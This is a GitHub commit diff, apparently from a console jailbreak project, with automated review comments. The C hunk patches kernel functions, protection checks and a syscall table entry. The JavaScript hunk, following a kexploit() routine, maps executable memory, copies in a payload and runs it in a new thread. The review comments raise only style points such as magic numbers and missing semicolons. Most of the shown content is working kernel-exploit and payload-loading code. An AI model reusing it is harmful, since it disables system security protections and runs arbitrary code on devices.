Merge branch 'main' into main

This commit is contained in:
Kameleon
2025-05-29 04:01:11 -06:00
committed by GitHub
4 changed files with 43 additions and 3 deletions
+3 -2
@@ -97,9 +97,10 @@ void do_patch(void) {
write8(kbase, KERNEL_copyinstr, 0xEB);
write8(kbase, KERNEL_copystr, 0xEB);
write16(kbase, KERNEL_veriPatch, 0x9090);
write32(kbase, KERNEL_setcr0_patch, 0xC3C7220F);
write32(kbase, KERNEL_setcr0_patch, 0xC3C7220F);
const size_t offset_sysent_11 = 0x1100520;
write32(kbase, offset_sysent_11, 2);
write32(kbase, offset_sysent_11, 6);
write64(kbase, offset_sysent_11 + 8, kbase + 0x4c7ad);
write32(kbase, offset_sysent_11 + 0x2c, 1);
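Review bot: `offset_sysent_11` is introduced as a local magic number (`const size_t offset_sysent_11 = 0x1100520;`) while every other address in this hunk goes through a named `KERNEL_*` symbol; define it alongside those (e.g. `KERNEL_sysent_11`) so all patched offsets are declared in one place and can be reviewed together. The line `write32(kbase, KERNEL_setcr0_patch, 0xC3C7220F);` appears twice in the hunk; if both copies are on the new side the second write is redundant and should be dropped, though this may be a rendering artifact of an old/new pair. do_patch begins before this hunk and continues after it.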
Binary file not shown.
Binary file not shown.
+40 -1
@@ -1739,7 +1739,7 @@ export async function kexploit() {
}
}
kexploit().then(() => {
/*kexploit().then(() => {
var payload_buffer = chain.sysp('mmap', new Int(0x26200000, 0x9), 0x300000, PROT_READ | PROT_WRITE | PROT_EXEC, 0x41000, -1, 0);
var payload_loader = new View4(window.pld);
chain.sys('mprotect', payload_loader.addr, payload_loader.size, PROT_READ | PROT_WRITE | PROT_EXEC);
@@ -1754,4 +1754,43 @@ kexploit().then(() => {
payload_loader.addr,
payload_buffer,
);
})*/
kexploit().then(() => {
function malloc(sz) {
var backing = new Uint8Array(0x10000 + sz);
nogc.push(backing);
var ptr = mem.readp(mem.addrof(backing).add(0x10));
ptr.backing = backing;
return ptr;
}
function malloc32(sz) {
var backing = new Uint8Array(0x10000 + sz * 4);
nogc.push(backing);
var ptr = mem.readp(mem.addrof(backing).add(0x10));
ptr.backing = new Uint32Array(backing.buffer);
return ptr;
}
window.pld_size = new Int(0x26200000, 0x9);
var payload_buffer = chain.sysp('mmap', window.pld_size, 0x300000, 7, 0x41000, -1, 0);
var payload = window.pld;
var bufLen = payload.length * 4
var payload_loader = malloc32(bufLen);
var loader_writer = payload_loader.backing;
for (var i = 0; i < payload.length; i++) {
loader_writer[i] = payload[i];
}
chain.sys('mprotect', payload_loader, bufLen, (0x1 | 0x2 | 0x4));
var pthread = malloc(0x10);
call_nze(
'pthread_create',
pthread,
0,
payload_loader,
payload_buffer,
);
})
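Review bot: `var bufLen = payload.length * 4` on the new side has no terminating semicolon and relies on ASI; write `const bufLen = payload.length * 4;`. The protection argument is spelled three different ways in the same callback — `7` in the `mmap` call, `(0x1 | 0x2 | 0x4)` in the `mprotect` call, and the named `PROT_READ | PROT_WRITE | PROT_EXEC` in the block that this commit comments out — so the two live calls should use the named constants, e.g. `chain.sys('mprotect', payload_loader, bufLen, PROT_READ | PROT_WRITE | PROT_EXEC);`. The previous `.then` callback is kept as a `/* … */` block rather than deleted, which leaves dead code to drift out of sync with the live version. `malloc` and `malloc32` repeat the same allocate/track/read sequence and differ only in the view stored on `ptr.backing`; one helper taking the view constructor would remove the duplication, and the `var` declarations could be `const`/`let`.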